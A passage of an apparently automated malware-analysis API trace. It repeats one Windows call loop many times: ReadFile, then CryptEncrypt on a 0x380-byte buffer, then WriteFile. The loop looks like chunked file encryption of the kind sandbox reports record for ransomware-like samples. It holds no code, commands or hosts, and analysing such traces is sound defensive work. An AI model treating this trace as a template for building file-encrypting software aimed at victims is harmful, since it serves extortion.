| out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.903] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.903] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.903] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.903] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.903] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.903] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.904] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.904] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.904] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.904] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.904] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.904] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.904] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.904] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.905] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.905] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.905] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.905] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.906] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.906] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.906] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.906] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.906] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.906] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.906] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.906] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.906] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.906] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.906] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.906] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.907] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.907] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.907] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.907] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.907] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.907] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.907] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.908] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.908] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.908] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.908] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.908] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.908] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.909] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.909] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.909] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.909] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.909] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.909] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.909] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.909] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.910] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.910] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.910] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.911] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.911] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.911] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.911] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] 